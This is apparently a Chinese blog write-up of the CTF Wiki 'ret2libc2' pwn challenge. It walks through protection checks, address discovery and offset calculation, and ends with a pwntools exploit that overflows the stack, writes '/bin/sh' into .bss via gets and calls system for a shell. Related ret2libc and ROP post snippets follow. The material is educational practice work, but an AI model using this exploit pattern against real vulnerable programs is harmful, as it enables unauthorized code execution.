ret2libc2做题过程(ctfwiki)

原创 已于 2022-02-12 20:23:44 修改 · 3.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn #python

于 2022-02-10 12:44:10 首次发布
本文详细介绍了如何利用ret2libc技术对32位程序进行栈溢出攻击,通过ida分析找到gets函数和system函数的地址,构造payload跳转到gets并执行/bin/sh,最终获取shell。实验步骤包括寻找plt段、计算偏移和构造exp来实现目标。

1.checksec保护机制

 

NX保护

32位程序

2.拖进ida

gets函数栈溢出

plt段有gets函数,所以可以返回到gets函数 

 

3.找gets和system地址

 向程序中 bss 段的 buf2 处写入 /bin/sh 字符串,并将其地址作为 system 的参数传入。这样以便于可以获得 shell

4.找buf2和ropgadgets

 

 

 

5.计算偏移 

6.exp

from pwn import*
p=process('./ret2libc2')

gets_plt=0x8048460 
system_plt=0x8048490


pop_ebx=0x0804843d 
buf2=0x804a080


payload=flat([b'a'*112,gets_plt,pop_ebx,buf2,system_plt,0xdeadbeef,buf2])
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

最后cat flag

Rt1Text
关注
pwn-ret2libc基础
admin的博客
10-04 1269
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
pwn入门系列-ret2libc2
小心信科理化声
12-10 3265
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1351
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
ctf wiki ret2libc2
weixin_55885866的博客
05-13 268
具体思路为 构造两段gadgets ,第一段用于将字符串”/bin/sh“ 存储到某个地址。再构造system取出。注:汇编语言需要和地址p32();需要先给某个地址输入”/bin/sh“
ret2libc
我多么希望明天有太阳,来灼烧我腐烂的梦想
08-12 802
ret2libc root@a1station:~/pwn/got# cat got.c #include <stdio.h> static int a; extern int b; extern void test(); int func() { a = 1; b = 2; return 0; } int main() { func(); ...
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 468
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 4028
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
CTFshow-pwn入门-前置基础pwn23-pwn25
你们de4月天的博客
06-19 2660
CTFshow-pwn入门-前置基础pwn23-pwn25
BJD3rd(DASCTF) pwn部分题目整理 (oj, stack_chk_fail, __libc_csu_fini, mprotect, init, orw,汇编)
carol2358的博客
05-26 1640
TaQiniOJ-0 #include “/home/ctf/fl ag”@Y Memory Monster I 有canary,利用触发canary时的__stack_chk_fail和题目的任意地址任意写,改写__stack_chk_fail为backdoor exp: from pwn import * from LibcSearcher import * local_file = './Memory_Monster_I' local_libc = '/lib/x86_64-li...
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 837
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
Ret2libc
iextract的博客
04-24 735
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
basic rop ret2libc2
archli的博客
08-09 372
题目地址:ret2libc2 看一下ctfwiki的wp,这个题目我也并不是很明白,我只能进行一部分猜测,应该是想让第一个sendline执行读取字符串的操作,居然有这种骚操作,属实搞不懂,这种只能先记住,别无它法。 还是先让get读到ret函数,然后执行get函数,里面有一个问题就是为啥,要执行pop ebx的操作,然后bss有个buf字符串,把他用上读,我读个屁啊,算了这题问大佬吧。等着修改...
pwn学习——ret2libc2
MrTreebook的博客
11-28 1313
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
pwn学习之ret2libc
weixin_43800829的博客
02-16 1483
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
基本ROP之ret2libc2
至臻求学,胸怀云月
02-14 3883
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
好好说话之ret2libc2
hollk’s blog
06-22 1574
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc2 看C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, inpu...
pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1650
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
ret2libc2
m0_54262894的博客
10-30 404
ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 先检查保护 放入ida 发现gets函数 Shift+F12 (因为在比赛中不会给你提示有没有 /bin/sh ,所以还是需要自己找一下) 两个方法都没有发现/bin/sh...
使用ret2plt绕过libc安全
海枫的专栏
08-11 9097
使用ret2plt绕过libc安全
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值